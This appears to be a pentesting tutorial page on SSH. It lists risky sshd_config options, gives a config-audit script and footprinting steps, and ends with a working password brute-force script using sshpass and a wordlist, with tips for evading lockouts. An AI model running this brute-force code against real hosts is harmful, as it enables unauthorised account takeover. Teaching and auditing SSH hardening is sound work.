22 - Pentesting SSH

Secure Shell (SSH) lets two hosts establish an encrypted, authenticated connection across a possibly insecure network; the server listens on TCP port 22 by default.

Default Configuration

cat /etc/ssh/sshd_config | grep -v "^#" | sed -r '/^\s*$/d'
## DANGEROUS SETTINGS (the trailing notes are commentary; sshd itself accepts no inline comments)
PasswordAuthentication yes	#Allows password-based authentication, so accounts can be brute-forced.
PermitEmptyPasswords yes	#Allows accounts with an empty password to log in.
PermitRootLogin yes	#Allows direct login as root (with a password if PasswordAuthentication is also yes).
Protocol 1	#Enables the obsolete SSHv1 protocol with weak crypto (server support was removed in OpenSSH 7.4).
X11Forwarding yes	#Allows X11 forwarding for GUI applications.
AllowTcpForwarding yes	#Allows port forwarding through the server, i.e. pivoting into the internal network.
PermitTunnel yes	#Allows tun(4) device forwarding, a layer-3 VPN over SSH.
DebianBanner yes	#Appends the Debian package revision to the version banner, which reveals the exact patch level.
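To check a retrieved sshd_config for the settings above without eyeballing it, the following added example (not from the original page) normalises the file and flags each dangerous directive. It assumes a POSIX sh with awk and uses a constructed sample config for the demo; on a real host run it as `sshd_audit < /etc/ssh/sshd_config`.

```sh
#!/bin/sh
# Added example, not from the original page: audit an sshd_config for the
# dangerous settings listed above. Reads the config on stdin:
#     sshd_audit < /etc/ssh/sshd_config
# SAMPLE_SSHD_CONFIG below is constructed for an offline demo.

# Normalise the config to one "keyword value" pair per line: keywords are
# case-insensitive (lower-cased here), "Key=value" is accepted by sshd, and
# only whole-line comments exist (sshd rejects trailing '#' text).
# Directives inside a Match block apply conditionally, so parsing stops there.
sshd_directives() {
    awk '
        { sub(/^[ \t]+/, "") }
        /^#/ || /^$/ { next }
        match($0, /^[^ \t=]+[ \t]*=/) {
            key = substr($0, 1, RLENGTH - 1); sub(/[ \t]+$/, "", key)
            $0 = key " " substr($0, RLENGTH + 1)
        }
        tolower($1) == "match" { exit }
        { print tolower($1), $2 }
    '
}

# Report the dangerous settings. sshd honours the first value it sees for a
# keyword, so later duplicates are ignored. Two OpenSSH defaults are dangerous
# when the directive is simply absent: PasswordAuthentication and
# AllowTcpForwarding both default to yes.
sshd_audit() {
    sshd_directives | awk '
        BEGIN {
            bad["passwordauthentication"] = "yes"
            bad["permitemptypasswords"]   = "yes"
            bad["permitrootlogin"]        = "yes"
            bad["x11forwarding"]          = "yes"
            bad["allowtcpforwarding"]     = "yes"
            bad["debianbanner"]           = "yes"
        }
        seen[$1]++ { next }
        ($1 in bad) && $2 == bad[$1]        { print "[!] " $1 " " $2 }
        $1 == "protocol" && index($2, "1")  { print "[!] protocol " $2 " (SSHv1 enabled)" }
        $1 == "permittunnel" && $2 != "no"  { print "[!] permittunnel " $2 }
        END {
            if (!("passwordauthentication" in seen)) print "[!] passwordauthentication absent (default yes)"
            if (!("allowtcpforwarding" in seen))     print "[!] allowtcpforwarding absent (default yes)"
        }
    '
}

# Number of findings (0 when the config is clean).
sshd_audit_count() {
    sshd_audit | grep -c '^\[!\]' || true
}

# Constructed sample config (not taken from any real host).
SAMPLE_SSHD_CONFIG='# constructed sample
Port 22
Protocol 2,1
PermitRootLogin yes
PasswordAuthentication yes
PasswordAuthentication no
PermitEmptyPasswords no
PermitTunnel=point-to-point
X11Forwarding yes
DebianBanner yes
Match User deploy
    AllowTcpForwarding yes'

printf '%s\n' "$SAMPLE_SSHD_CONFIG" | sshd_audit   # 7 findings
```

The second PasswordAuthentication line and the AllowTcpForwarding inside the Match block are deliberately ignored, because that is how sshd reads them: the first value wins, and Match-scoped directives only apply to matching users, so the global default (yes) is what an attacker without that user gets.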

Footprinting SSH

One of the tools we can use to fingerprint an SSH server is ssh-audit. It checks server-side configuration (and client-side configuration in its client mode) and reports the version banner, the key-exchange, host-key, cipher and MAC algorithms that are still offered, and flags the weak or deprecated ones, which gives us both a software version to look up and a view of any legacy crypto still enabled.

git clone https://github.com/jtesta/ssh-audit.git && cd ssh-audit
./ssh-audit.py 10.129.14.132

For password brute-force attacks, pin the SSH client to one authentication method with the PreferredAuthentications option (password, or keyboard-interactive on servers that authenticate through PAM and do not offer password) and turn off public-key authentication, so each connection spends its attempts on the method under attack. The server's MaxAuthTries (default 6) caps attempts per connection, and every failure is logged and may trigger a lockout such as fail2ban, so keep the attempt rate low and the wordlist targeted.
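The following added example (not part of the original page) puts that into practice: it parses the server's offered authentication methods out of ssh -v output, picks the method to attack, and runs a password-only brute force. user@host, the port and the wordlist path are placeholder arguments, sshpass is assumed for feeding passwords, and the ssh -v transcripts are constructed.

```sh
#!/bin/sh
# Added example, not from the original page: find out which authentication
# methods a server will accept for a user, then brute-force with the client
# pinned to that method. user@host, the port and the wordlist are placeholders;
# the SAMPLE_SSH_VERBOSE_* transcripts are constructed for the offline demo.

# Parse `ssh -v` output (stdin). After every failed method the server lists what
# it will still accept as "Authentications that can continue: a,b"; the last
# such line is the authoritative one.
ssh_auth_methods() {
    awk -F': ' '/Authentications that can continue:/ { m = $NF } END { print m }'
}

# Pick the PreferredAuthentications value to brute-force with: "password" when
# offered, otherwise "keyboard-interactive" (PAM-backed servers often expose only
# that, and PreferredAuthentications=password would then fail every attempt).
ssh_pick_password_method() {
    methods=$(ssh_auth_methods)
    case ",$methods," in
        *,password,*)             echo password ;;
        *,keyboard-interactive,*) echo keyboard-interactive ;;
        *)                        return 1 ;;
    esac
}

# Live probe: PubkeyAuthentication=no stops the client from spending attempts on
# local keys and BatchMode=yes makes it fail instead of prompting, so the
# server's answer to the initial "none" attempt is what gets captured.
ssh_probe_methods() {   # usage: ssh_probe_methods user@host [port]
    ssh -v -n -p "${2:-22}" -o BatchMode=yes -o PubkeyAuthentication=no \
        -o StrictHostKeyChecking=no -o ConnectTimeout=5 "$1" true 2>&1 \
    | ssh_auth_methods
}

# Brute-force one user with a wordlist, one connection per password. sshpass -e
# takes the password from $SSHPASS; ssh -n keeps ssh from eating the wordlist on
# stdin. Expect MaxAuthTries, fail2ban-style lockouts and sshd logging; hydra,
# medusa or ncrack parallelise and throttle this better for real engagements.
ssh_password_bruteforce() {   # usage: ssh_password_bruteforce user@host wordlist [port] [method]
    command -v sshpass >/dev/null 2>&1 || { echo "sshpass not installed" >&2; return 2; }
    method=${4:-password}
    while IFS= read -r pw; do
        if SSHPASS="$pw" sshpass -e ssh -n -p "${3:-22}" \
                -o PreferredAuthentications="$method" -o PubkeyAuthentication=no \
                -o NumberOfPasswordPrompts=1 -o StrictHostKeyChecking=no \
                -o ConnectTimeout=5 "$1" true 2>/dev/null; then
            echo "valid: $1 $pw"
            return 0
        fi
    done < "$2"
    return 1
}

# Constructed transcripts of `ssh -v` against two servers (not real captures).
SAMPLE_SSH_VERBOSE_PW='debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey,password
debug1: No more authentication methods to try.
user@10.129.14.132: Permission denied (publickey,password).'

SAMPLE_SSH_VERBOSE_PAM='debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey,keyboard-interactive
debug1: Next authentication method: keyboard-interactive
debug1: Authentications that can continue: publickey,keyboard-interactive
debug1: No more authentication methods to try.
user@10.129.14.132: Permission denied (publickey,keyboard-interactive).'

printf '%s\n' "$SAMPLE_SSH_VERBOSE_PW"  | ssh_pick_password_method   # password
printf '%s\n' "$SAMPLE_SSH_VERBOSE_PAM" | ssh_pick_password_method   # keyboard-interactive
```

Against a live target the flow is `ssh_probe_methods user@host | ssh_pick_password_method` to learn the method, then `ssh_password_bruteforce user@host wordlist.txt 22 <method>`; if the probe prints only publickey, password guessing is pointless for that user and the time is better spent elsewhere.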

Nmap Scripts